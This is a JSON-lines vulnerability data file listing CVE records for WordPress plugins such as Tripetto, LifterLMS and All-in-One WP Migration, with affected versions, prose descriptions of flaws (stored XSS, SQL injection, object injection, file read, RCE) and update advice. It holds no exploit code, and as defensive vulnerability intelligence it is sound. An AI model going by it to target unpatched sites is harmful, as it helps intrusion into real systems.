{"CVE_ID":"CVE-2023-0233","slug":"activecampaign-subscription-forms","versionEndExcluding":"8.1.12","description":"The ActiveCampaign WordPress plugin before 8.1.12 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95c85fd-fa47-45bd-b8e0-a7f33edd7130\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95c85fd-fa47-45bd-b8e0-a7f33edd7130\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3575","slug":"quiz-master-next","versionEndExcluding":"8.1.11","description":"The Quiz And Survey Master WordPress plugin before 8.1.11 does not properly sanitize and escape question titles, which could allow users with the Contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f884688-2c0d-4844-bd31-ef7085edf112\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f884688-2c0d-4844-bd31-ef7085edf112\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-26524","slug":"quiz-master-next","versionImpact":"8.0.10","versionEndExcluding":"8.1.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in ExpressTech Quiz And Survey Master \u2013 Best Quiz, Exam and Survey Plugin for WordPress plugin <=\u00a08.0.10 versions.","recommendation":"Update to version 8.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quiz-master-next\\\/wordpress-quiz-and-survey-master-plugin-8-0-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quiz-master-next\\\/wordpress-quiz-and-survey-master-plugin-8-0-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5439","slug":"wp-photo-text-slider-50","versionImpact":"8.0","versionEndExcluding":"8.1","description":"The Wp photo text slider 50 plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 8.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985502\\\/wp-photo-text-slider-50#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985502\\\/wp-photo-text-slider-50#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-text-slider-50\\\/trunk\\\/wp-photo-text-slider-50.php?rev=2827206#L196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-text-slider-50\\\/trunk\\\/wp-photo-text-slider-50.php?rev=2827206#L196\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/515502b5-c344-4855-aff1-57833233c5d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/515502b5-c344-4855-aff1-57833233c5d2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12041","slug":"directorist","versionImpact":"8.0.12","versionEndExcluding":"8.1","description":"The Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 8.0.12 via the \/wp-json\/directorist\/v1\/users\/ endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, email addresses, names, and more information about users.","recommendation":"Update to version 8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208874\\\/directorist\\\/tags\\\/8.0.9\\\/includes\\\/rest-api\\\/Version1\\\/class-users-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208874\\\/directorist\\\/tags\\\/8.0.9\\\/includes\\\/rest-api\\\/Version1\\\/class-users-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231156\\\/directorist\\\/tags\\\/8.1\\\/includes\\\/rest-api\\\/Version1\\\/class-users-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231156\\\/directorist\\\/tags\\\/8.1\\\/includes\\\/rest-api\\\/Version1\\\/class-users-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d9817ff-ca56-4941-97bc-f26defe7ddd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d9817ff-ca56-4941-97bc-f26defe7ddd5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13829","slug":"tripetto","versionImpact":"8.0.8","versionEndExcluding":"8.0.9","description":"The WordPress form builder plugin for contact forms, surveys and quizzes \u2013 Tripetto plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 8.0.8 via the 'attachments.php' file. This makes it possible for unauthenticated attackers to extract sensitive data including files uploaded via forms.","recommendation":"Update to version 8.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231968\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231968\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a938042-bad6-4fe0-8905-148d07a22996?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a938042-bad6-4fe0-8905-148d07a22996?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22295","slug":"tripetto","versionImpact":"8.0.6","versionEndExcluding":"8.0.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tripetto WordPress form builder plugin for contact forms, surveys and quizzes \u2013 Tripetto allows Stored XSS. This issue affects WordPress form builder plugin for contact forms, surveys and quizzes \u2013 Tripetto: from n\/a through 8.0.5.","recommendation":"Update to version 8.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/tripetto\\\/vulnerability\\\/wordpress-tripetto-plugin-8-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/tripetto\\\/vulnerability\\\/wordpress-tripetto-plugin-8-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2290","slug":"lifterlms","versionImpact":"8.0.1","versionEndExcluding":"8.0.2","description":"The LifterLMS \u2013 WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to Unauthenticated Post Trashing due to a missing capability check on the delete_access_plan function and the related AJAX calls in all versions up to, and including, 8.0.1. This makes it possible for unauthenticated attackers to change status to \"Trash\" for every published post, therefore limiting the availability of the website's content.","recommendation":"Update to version 8.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257328\\\/lifterlms\\\/trunk\\\/includes\\\/class.llms.ajax.handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257328\\\/lifterlms\\\/trunk\\\/includes\\\/class.llms.ajax.handler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f64dbf2-b75a-4a35-9b4e-413b8fd1fff0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f64dbf2-b75a-4a35-9b4e-413b8fd1fff0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13497","slug":"tripetto","versionImpact":"8.0.9","versionEndExcluding":"8.0.10","description":"The WordPress form builder plugin for contact forms, surveys and quizzes \u2013 Tripetto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via attachment uploads in all versions up to, and including, 8.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the uploaded file.","recommendation":"Update to version 8.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3251202%40tripetto%2Ftrunk&old=3231968%40tripetto%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3251202%40tripetto%2Ftrunk&old=3231968%40tripetto%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbbe006c-1afc-4c8b-a9f3-ffb21cdabb54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbbe006c-1afc-4c8b-a9f3-ffb21cdabb54?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45074","slug":"advanced-page-visit-counter","versionEndExcluding":"8.0.1","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Page Visit Counter Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress allows SQL Injection. This issue affects Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress: from n\/a through 7.1.1.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-7-1-1-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-7-1-1-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13619","slug":"lifterlms","versionImpact":"8.0.0","versionEndExcluding":"8.0.1","description":"The LifterLMS WordPress plugin before 8.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 8.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97a7e1a6-0fb3-49e9-86fc-ebb1d426fcca\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97a7e1a6-0fb3-49e9-86fc-ebb1d426fcca\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10803","slug":"fwdmsp","versionEndExcluding":"8.0","description":"The MP3 Sticky Player plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 8.0 via the content\/downloader.php file. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Please note the vendor released the patched version as the same version as the affected version.","recommendation":"Update to version 8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/mp3-sticky-player-wordpress-plugin\\\/7930491\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/mp3-sticky-player-wordpress-plugin\\\/7930491\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bcd4675-e930-44d9-8278-c4c9e877656a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bcd4675-e930-44d9-8278-c4c9e877656a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10942","slug":"all-in-one-wp-migration","versionImpact":"7.89","versionEndExcluding":"7.90","description":"The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 7.89 via deserialization of untrusted input in the 'replace_serialized_values' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must export and restore a backup in order to trigger the exploit.","recommendation":"Update to version 7.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/vendor\\\/servmask\\\/database\\\/class-ai1wm-database-utility.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/vendor\\\/servmask\\\/database\\\/class-ai1wm-database-utility.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253940\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253940\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0823d1d9-4f3b-4ac0-8cd1-ad208ebc325f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0823d1d9-4f3b-4ac0-8cd1-ad208ebc325f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4142","slug":"wp-ultimate-csv-importer","versionEndExcluding":"7.9.9","description":"The WP Ultimate CSV Importer plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 7.9.8 via the '->cus1' parameter. This allows authenticated attackers with author-level permissions or above, if the administrator previously grants access in the plugin settings, to execute code on the server. The author resolved this vulnerability by removing the ability for authors and editors to import files. Please note that this means remote code execution is still possible for site administrators; use the plugin with caution.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db1bad2e-55df-40c5-9a3f-651858a19b42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db1bad2e-55df-40c5-9a3f-651858a19b42?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2455","slug":"bdthemes-element-pack","versionImpact":"7.9.0","versionEndExcluding":"7.9.1","description":"The Element Pack - Addon for Elementor Page Builder WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the widget wrapper link URL in all versions up to, and including, 7.9.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1903527e-d7d9-48a0-b59d-65ec5e14def2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1903527e-d7d9-48a0-b59d-65ec5e14def2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/feedback.elementpack.pro\\\/announcements#:~:text=Version%207.9.1%20Released\",\"name\":\"https:\\\/\\\/feedback.elementpack.pro\\\/announcements#:~:text=Version%207.9.1%20Released\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/feedback.elementpack.pro\\\/announcements\",\"name\":\"https:\\\/\\\/feedback.elementpack.pro\\\/announcements\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4772","slug":"newsletter","versionEndExcluding":"7.9.0","description":"The Newsletter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'newsletter_form' shortcode in versions up to, and including, 7.8.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2955097\\\/newsletter#file21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2955097\\\/newsletter#file21\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter\\\/tags\\\/7.8.9\\\/subscription\\\/subscription.php#L1653\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter\\\/tags\\\/7.8.9\\\/subscription\\\/subscription.php#L1653\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87da5300-1add-44fc-a3e0-e8912f946c84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87da5300-1add-44fc-a3e0-e8912f946c84?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0983","slug":"stylish-cost-calculator-premium","versionEndExcluding":"7.9.0","description":"The stylish-cost-calculator-premium WordPress plugin before 7.9.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Stored Cross-Site Scripting which could be used against admins when viewing submissions submitted through the Email Quote Form.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73353221-3e6d-44e8-bf41-55a0fe57d81f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73353221-3e6d-44e8-bf41-55a0fe57d81f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5488","slug":"wp-seopress","versionImpact":"7.8","versionEndExcluding":"7.9","description":"The SEOPress  WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.","recommendation":"Update to version 7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28507376-ded0-4e1a-b2fc-2182895aa14c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28507376-ded0-4e1a-b2fc-2182895aa14c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8852","slug":"all-in-one-wp-migration","versionImpact":"7.86","versionEndExcluding":"7.87","description":"The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.86 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information such as full paths contained in the exposed log files.","recommendation":"Update to version 7.87, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4901d9d-7b37-40d5-a42b-59c80bbbe8ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4901d9d-7b37-40d5-a42b-59c80bbbe8ff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/tags\\\/7.86\\\/functions.php#L297\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/tags\\\/7.86\\\/functions.php#L297\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168605%40all-in-one-wp-migration&new=3168605%40all-in-one-wp-migration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168605%40all-in-one-wp-migration&new=3168605%40all-in-one-wp-migration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9162","slug":"all-in-one-wp-migration","versionImpact":"7.86","versionEndExcluding":"7.87","description":"The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to arbitrary PHP Code Injection due to missing file type validation during the export in all versions up to, and including, 7.86. This makes it possible for authenticated attackers, with Administrator-level access and above, to create an export file with the .php extension on the affected site's server, adding an arbitrary PHP code to it, which may make remote code execution possible.","recommendation":"Update to version 7.87, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d97c3379-56c9-4261-9a70-3119ec121a40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d97c3379-56c9-4261-9a70-3119ec121a40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/controller\\\/class-ai1wm-backups-controller.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/controller\\\/class-ai1wm-backups-controller.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/controller\\\/class-ai1wm-export-controller.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/controller\\\/class-ai1wm-export-controller.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2024-9162\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2024-9162\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/CVE-2024-9162\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/CVE-2024-9162\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10579","slug":"wordpress-popup","versionImpact":"7.8.5","versionEndExcluding":"7.8.6","description":"The Hustle \u2013 Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the preview_module() function in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view unpublished forms.","recommendation":"Update to version 7.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/tags\\\/7.8.5\\\/inc\\\/hustle-modules-common-admin-ajax.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/tags\\\/7.8.5\\\/inc\\\/hustle-modules-common-admin-ajax.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/trunk\\\/inc\\\/hustle-modules-common-admin-ajax.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/trunk\\\/inc\\\/hustle-modules-common-admin-ajax.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd96d9c-c1ab-4a53-a52a-9fc2541482f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd96d9c-c1ab-4a53-a52a-9fc2541482f2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10580","slug":"wordpress-popup","versionImpact":"7.8.5","versionEndExcluding":"7.8.6","description":"The Hustle \u2013 Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized form submissions due to a missing capability check on the submit_form() function in all versions up to, and including, 7.8.5. This makes it possible for unauthenticated attackers to submit unpublished forms.","recommendation":"Update to version 7.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/tags\\\/7.8.5\\\/inc\\\/front\\\/hustle-module-front-ajax.php#L251\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/tags\\\/7.8.5\\\/inc\\\/front\\\/hustle-module-front-ajax.php#L251\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196639\\\/wordpress-popup\\\/tags\\\/7.8.6\\\/inc\\\/front\\\/hustle-module-front-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196639\\\/wordpress-popup\\\/tags\\\/7.8.6\\\/inc\\\/front\\\/hustle-module-front-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b2f8726-c4c4-4ed6-aa8d-4412cf5be061?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b2f8726-c4c4-4ed6-aa8d-4412cf5be061?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12596","slug":"lifterlms","versionImpact":"7.8.5","versionEndExcluding":"7.8.6","description":"The LifterLMS \u2013 WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to arbitrary post deletion due to a missing capability check on the 'llms_delete_cert' action in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.","recommendation":"Update to version 7.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208662\\\/lifterlms\\\/trunk\\\/includes\\\/abstracts\\\/llms-abstract-controller-user-engagements.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208662\\\/lifterlms\\\/trunk\\\/includes\\\/abstracts\\\/llms-abstract-controller-user-engagements.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208662\\\/lifterlms\\\/trunk\\\/includes\\\/controllers\\\/class.llms.controller.certificates.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208662\\\/lifterlms\\\/trunk\\\/includes\\\/controllers\\\/class.llms.controller.certificates.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e75a03b-7552-4228-a4d0-13c78d20f6d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e75a03b-7552-4228-a4d0-13c78d20f6d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
